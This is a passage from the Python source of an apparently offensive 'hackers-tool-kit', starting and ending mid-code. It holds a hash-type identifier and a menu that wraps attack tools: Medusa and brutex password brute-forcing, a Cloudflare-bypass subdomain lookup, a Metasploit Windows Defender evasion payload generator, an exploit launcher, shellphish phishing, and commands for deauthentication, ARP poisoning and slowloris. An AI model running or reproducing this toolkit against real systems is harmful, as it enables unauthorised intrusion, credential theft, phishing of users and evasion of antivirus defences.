hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arppois": + appois() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == 